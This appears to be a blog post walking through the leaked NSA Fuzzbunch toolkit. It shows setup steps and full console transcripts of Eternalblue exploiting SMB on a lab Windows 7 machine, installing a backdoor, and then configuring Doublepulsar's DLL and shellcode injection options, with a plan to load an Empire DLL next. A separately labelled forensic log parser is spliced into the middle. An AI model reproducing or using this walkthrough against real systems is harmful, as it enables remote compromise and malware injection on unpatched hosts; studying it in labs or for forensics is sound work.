Deepening my understanding of Eternalblue

Let's try out the NSA hacking tools.

Downloaded from GitHub.

Beforehand, download Python 2.6.6 (32-bit) and Pywin32 v2.12.

Use fb.py inside the windows folder. I believe this fb.py is Fuzzbunch.

Fuzzbunch is described as a vulnerability verification tool. To me it looks like nothing but an attack tool.

The following error occurs, so create the listeningposts folder in advance.

WindowsError: [Error 3] 指定されたパスが見つかりません。: 'C:\\shadowbroker-master\\windows\\listeningposts/*.*'

Run it with python, then run Eternalblue.

[*] Should Redirection be set to "NO" so that it turns OFF? (to be investigated)

PS C:\shadowbroker-master\shadowbroker-master\windows> python .\fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute


[+] Set FbStorage => C:\shadowbroker-master\shadowbroker-master\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] :
…
[*] Initializing Global State
[+] Set TargetIp => 10.0.2.4
[+] Set CallbackIp => 10.0.2.5

[+] Redirection ON
[+] Set LogDir => C:\shadowbroker-master\shadowbroker-master\windows\logs\test\z10.0.2.4
[+] Set Project => test

fb > use Et
Eternalblue     Eternalchampion Eternalromance  Eternalsynergy
fb > use Eternalblue
…
[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 1


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
…
[?] Press Any Key To Continue :

Module: Eternalblue
===================

Name                  Set Value    Redirected Value
----                  ---------    ----------------
DaveProxyPort         0
NetworkTimeout        60
TargetIp              10.0.2.4     127.0.0.1
TargetPort            445          445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2

[?] Execute Plugin? [Yes] : Yes
[*] Executing Plugin
[*] Connecting to target for exploitation.
 [+] Connection established for exploitation.
[*] Pinging backdoor...
 [+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (41 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic
0x00000020 65 20 50 61 63 6b 20 31 00 e Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
 ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
 [+] Sending SMBv2 buffers
 ....DONE.
 [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
 DONE.
[*] Receiving response from exploit packet
 [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
 [+] Backdoor returned code: 10 - Success!
 [+] Ping returned Target architecture: x86 (32-bit)
 [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

This shows that "Eternalblue" installed a backdoor.

I had thought Doublepulsar was the backdoor.
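Fuzzbunch writes this console output to the LogDir set above, so the same lines can turn up on a seized or compromised workstation during an investigation. The parser below is an added example (not part of the original post and not code from the leaked tooling) that recovers the forensic facts from such a log: the target parameters, the OS banner that the exploit decoded from the SMB reply (the "CORE raw buffer dump"), the backdoor return code and architecture, and whether the install was reported as successful. The sample log is constructed from the transcript above; the hex dump is rebuilt from the declared byte count rather than by guessing where the hex column ends, because Fuzzbunch does not delimit the ASCII column.

```python
"""Recover forensic facts from a Fuzzbunch/Eternalblue console log.

Added example, not part of the original post or of the leaked tooling.
"""
import json
import re

# Constructed sample: the relevant lines of the transcript above, verbatim.
SAMPLE_LOG = """\
[+] Set TargetIp => 10.0.2.4
[+] Set CallbackIp => 10.0.2.5
[*] Pinging backdoor...
 [+] Backdoor not installed, game on.
[*] CORE raw buffer dump (41 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic
0x00000020 65 20 50 61 63 6b 20 31 00 e Pack 1.
 [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
 [+] Backdoor returned code: 10 - Success!
 [+] Ping returned Target architecture: x86 (32-bit)
 [+] Backdoor installed
[+] Eternalblue Succeeded
"""

SET_RE = re.compile(r"^\s*\[\+\] Set (\w+) => (.+?)\s*$")
DUMP_HDR_RE = re.compile(r"^\s*\[\*\] CORE raw buffer dump \((\d+) bytes\):")
DUMP_LINE_RE = re.compile(r"^0x([0-9a-fA-F]{8}) (.*)$")
ARCH_RE = re.compile(r"Ping returned Target architecture: (\S+)")
CODE_RE = re.compile(r"Backdoor returned code: (\d+)")


def parse_hexdump(lines, total):
    """Rebuild raw bytes from Fuzzbunch's 16-bytes-per-line dump.

    The ASCII column is not separated from the hex column, so the declared
    byte count decides how many tokens to read: a line at offset `off`
    carries min(16, total - off) bytes.
    """
    out = bytearray()
    for line in lines:
        m = DUMP_LINE_RE.match(line)
        if not m:
            break
        off = int(m.group(1), 16)
        if off != len(out):
            raise ValueError("non-contiguous dump at offset 0x%08x" % off)
        n = min(16, total - off)
        tokens = m.group(2).split()
        out += bytes(int(t, 16) for t in tokens[:n])
        if len(out) >= total:
            break
    if len(out) != total:
        raise ValueError("dump declared %d bytes, got %d" % (total, len(out)))
    return bytes(out)


def parse_fuzzbunch_log(text):
    """Return a dict of facts an investigator would want from the log."""
    facts = {"params": {}, "os_banner": None, "backdoor_installed": False,
             "backdoor_code": None, "arch": None, "exploit_succeeded": False}
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = SET_RE.match(line)
        if m:
            facts["params"][m.group(1)] = m.group(2)
        m = DUMP_HDR_RE.match(line)
        if m:
            raw = parse_hexdump(lines[i + 1:], int(m.group(1)))
            # The banner is a NUL-terminated ASCII string.
            facts["os_banner"] = raw.split(b"\x00", 1)[0].decode("ascii", "replace")
        m = CODE_RE.search(line)
        if m:
            facts["backdoor_code"] = int(m.group(1))
        m = ARCH_RE.search(line)
        if m:
            facts["arch"] = m.group(1)
        if "[+] Backdoor installed" in line:
            facts["backdoor_installed"] = True
        if "[+] Eternalblue Succeeded" in line:
            facts["exploit_succeeded"] = True
    return facts


if __name__ == "__main__":
    print(json.dumps(parse_fuzzbunch_log(SAMPLE_LOG), indent=2))
```

Running it on the sample prints the target 10.0.2.4, the banner "Windows 7 Enterprise 7601 Service Pack 1", code 10, architecture x86 and both success flags; pointing it at a whole LogDir tree gives a quick list of which hosts were hit and which reported a successful install.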

fb Special (Eternalblue) > show Payload

Plugin Category: Payload
========================

  Name              Version
  ----              -------
  Doublepulsar      1.3.1
  Jobadd            1.1.1
  Jobdelete         1.1.1
  Joblist           1.1.1
  Pcdlllauncher     2.3.1
  Processlist       1.1.1
  Regdelete         1.1.1
  Regenum           1.1.1
  Regread           1.1.1
  Regwrite          1.1.1
  Rpcproxy          1.0.1
  Smbdelete         1.1.1
  Smblist           1.1.1
  Smbread           1.1.1
  Smbwrite          1.1.1

This shows that Doublepulsar is one of Eternalblue's payloads.

fb Special (Eternalblue) > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.0.2.4

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          10.0.2.4
TargetPort        445
OutputFile
Protocol          SMB
Architecture      x86
Function          OutputInstall
…
[*]  TargetIp :: Target IP Address

[?] TargetIp [10.0.2.4] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] :

So RunDLL is what shoves the actual malware onto the target. I'm impressed at how well-made a tool this is, with good usability as well.

Next time I'll try sending in a DLL generated with EMPIRE.